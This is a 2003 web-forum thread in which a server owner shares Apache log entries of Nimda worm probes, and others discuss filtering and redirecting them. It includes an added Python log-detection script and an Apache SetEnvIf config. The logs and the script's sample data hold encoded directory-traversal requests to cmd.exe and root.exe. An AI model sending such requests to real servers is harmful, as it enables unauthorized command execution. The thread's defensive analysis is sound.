#1
Junior Member, Devshed Newbie (0 - 499 posts)
Join Date: Mar 2003
Posts: 2
Rep Power: 0

    Attempted Hack??


    Hi

    Having just set up a web server on my home computer, I was surprised to find this hack attack (and several identical ones) in my logs. I'm pretty confident I have everything nailed down (but not complacent). Wondered if anyone had any comment about this visitor??

    As they originate from blueyonder IP addresses, I'm planning to report them.

    Steve


    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
    80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
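The probe lines above can be read mechanically. The script below is an added example (not the poster's code) of the detection a practitioner would run over them: it parses Apache combined-format entries, canonicalizes the request path the way the decoder flaws these probes are written for would (percent-decoding applied more than once turns `%255c` into `\`; unchecked two-byte UTF-8 with lead byte C0/C1 turns `%c0%af` into `/` and `%c1%1c` or `%c1%9c` into `\`), then matches the usual probe targets (`root.exe`, `cmd.exe`, traversal) per source address. The sample input is six lines taken from the log above plus one constructed benign request from 192.0.2.10; the decoder is a model of the flaws, not an IIS emulation.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Sample input: six probe lines taken from the post above plus one constructed
# benign request from 192.0.2.10, so the script runs offline.
SAMPLE_LOG = '''
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
192.0.2.10 - - [02/Mar/2003:20:40:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
'''.strip()

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# "../" at the start of the path or right after a "/"; lookbehind so that
# adjacent "../../" segments are both counted.
TRAVERSAL_RE = re.compile(r'(?<![^/])\.\./')

# Probe targets, matched against the canonical path.
SIGNATURES = (
    ('root.exe backdoor', re.compile(r'/root\.exe(\?|$)', re.I)),
    ('cmd.exe request', re.compile(r'/cmd\.exe(\?|$)', re.I)),
    ('directory traversal', TRAVERSAL_RE),
)


def canonicalize(path):
    """Model (not an IIS emulation) of the two decoder flaws the probes target:
    percent-decoding applied more than once, so %255c -> %5c -> '\\', and
    2-byte UTF-8 with lead byte C0/C1 accepted without validation, so
    %c0%af -> '/' and %c1%9c or %c1%1c -> '\\'.
    Returns the decoded path with '\\' normalized to '/'."""
    cur = path.encode('latin-1', 'replace')
    for _ in range(3):                      # bounded: decode until stable
        raw = unquote_to_bytes(cur)
        out = bytearray()
        i = 0
        while i < len(raw):
            b = raw[i]
            if b in (0xC0, 0xC1) and i + 1 < len(raw):
                # Overlong form: an unchecked decoder yields plain ASCII here.
                out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
                i += 2
            else:
                out.append(b)
                i += 1
        if bytes(out) == cur:
            break
        cur = bytes(out)
    return cur.decode('latin-1').replace('\\', '/')


def classify(path):
    """Return (canonical_path, [signature names]) for one request path."""
    canon = canonicalize(path)
    hits = [name for name, rx in SIGNATURES if rx.search(canon)]
    # More "../" segments after decoding than before means the encoding was
    # chosen to slip past a filter that only looks at the raw URI.
    if len(TRAVERSAL_RE.findall(canon)) > len(TRAVERSAL_RE.findall(path)):
        hits.append('traversal hidden by encoding')
    return canon, hits


def analyze(log_text):
    """Per source address: requests, probe hits, hits answered 2xx, signatures."""
    report = defaultdict(lambda: {'requests': 0, 'hits': 0, 'served': 0,
                                  'signatures': set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # malformed line: skip, never crash
        entry = report[m['ip']]
        entry['requests'] += 1
        _canon, hits = classify(m['path'])
        if hits:
            entry['hits'] += 1
            entry['signatures'].update(hits)
            if m['status'].startswith('2'):
                entry['served'] += 1        # a probe that actually got content
    return dict(report)


if __name__ == '__main__':
    for ip, info in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {info['hits']}/{info['requests']} requests matched probe "
              f"signatures, {info['served']} answered 2xx: {sorted(info['signatures'])}")
```

The figure to look at is `served`, the count of probe hits answered with a 2xx. Every line in the log above got a 404 or 400, which is what a server that does not have those files looks like; a 200 on a `cmd.exe` request would be the sign that something was actually served. The four differently encoded traversal lines all canonicalize to the same path, which is why a filter on the raw URI is a weaker check than one on the decoded path.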
#2
Contributing User, Devshed God 1st Plane (5500 - 5999 posts)
Join Date: Oct 2000
Location: Back in the real world.
Posts: 5,966
Rep Power: 190

    Yes, it's a hack attempt.
    But nothing to be done about it. They happen at least 3-10 times per day on our company's web server (non-public!). Some people are just too lazy to upgrade - you can tell them as often as you want...
    This makes the worms on the 'net stay alive.

    No need to worry if you secured your server.
#3
Registered User, Devshed Newbie (0 - 499 posts)
Join Date: Nov 2001
Location: Broadstairs (UK)
Posts: 17
Rep Power: 0

    In .htaccess, change this to prevent the server virus from writing false error messages:

    redirect /scripts http://www.stoptheviruscold.invalid
    redirect /MSADC http://www.stoptheviruscold.invalid
#4
Junior Member, Devshed Newbie (0 - 499 posts)
Join Date: Mar 2003
Posts: 2
Rep Power: 0

    Thanks for the info.

    Further investigation shows it to be a NIMDA virus trying to get to my machine.

    I quite like the redirect idea, but I'm not sure what advantage it offers over my own 404 message (my server is set up with non-standard dir names and very limited access, so standard attacks like this shouldn't get anywhere). Any real attack would spot the redirected http address and realise what the target site was doing.

    Interestingly, did you know you can't rename cmd.exe in win2000? If you do, win2000 re-creates it at boot!! Just shows that win 2000 still needs DOS.

    Steve
#5
Contributing User, Devshed God 1st Plane (5500 - 5999 posts)
Join Date: Oct 2000
Location: Back in the real world.
Posts: 5,966
Rep Power: 190

    "Just shows that win 2000 still needs DOS."
    No. This shows that Win2k is trying not to allow you to render the system unusable. This (the "magic" re-appearing, also if you delete the file) happens with all files in the system and system32 folders (and some more too). It's called PC-Health and was first introduced in WinME. Win2K and XP have it too, but I think it has another name now.
#6
Contributing User, Devshed Newbie (0 - 499 posts)
Join Date: Feb 2003
Posts: 164
Rep Power: 12

    This *NIMDA* worm is incredibly popular; a lot, and I mean a lot, of people were infected with it a while ago and are still being infected with it.
    If your server's secured against this type of intrusion, you have nothing to worry about.
    The redirection thing is a good idea for the users' sake. Most of the people who are infected with this (if not all) don't have a clue that they are, so redirecting them to a page explaining what they have on the box and the steps to removal could be really appreciated by a lot of them.

    Most of the people who are making these types of requests are actually still vulnerable to the attack themselves (they are running unpatched boxes), so anyone can access their machines.
    That's why that redirection thing could be good / helpful
    (something I did on my server a while ago).

    All the best
#7
Contributing User, Devshed Newbie (0 - 499 posts)
Join Date: Jan 2001
Posts: 4
Rep Power: 0

    Nimda/CodeRed doesn't care what Redirect Apache sends; thus, instructing it to redirect anywhere does not do what you think it would do.
    If you just don't want attempts like that to show up in your log, just use SetEnvIf to filter them out. Don't ask me how (I have replied over a hundred times on this issue already); just search for SetEnvIf under my username.
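As an added example of the SetEnvIf approach this post refers to (not that poster's configuration), the fragment below keeps the worm probes out of the main access log while still recording them in a separate file, so the evidence needed for an abuse report to the ISP is not thrown away. The directive names are Apache's own; the log file paths and the environment variable name `worm_probe` are assumptions, and the `combined` nickname assumes the standard `LogFormat ... combined` line from the default httpd.conf is present. Unlike the `Redirect` lines earlier in the thread, this belongs in httpd.conf or a `<VirtualHost>` block, because `CustomLog` is not permitted in .htaccess.

```apache
# Added example, not the poster's configuration. Server config or
# <VirtualHost> context; CustomLog is not allowed in .htaccess.
# Paths and the variable name "worm_probe" are assumptions.

# Mark requests for the worm's usual targets, as seen in the log above.
SetEnvIfNoCase Request_URI "(root|cmd)\.exe"  worm_probe
SetEnvIfNoCase Request_URI "/winnt/system32/" worm_probe

# Keep the noise out of the main log, but keep the evidence for abuse reports.
CustomLog logs/access_log      combined env=!worm_probe
CustomLog logs/worm_probes_log combined env=worm_probe
```

The second `CustomLog` is the part that matters if you intend to report the source addresses: a filter that only drops the lines leaves you with nothing to send. Check the result with `apachectl configtest` before reloading.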
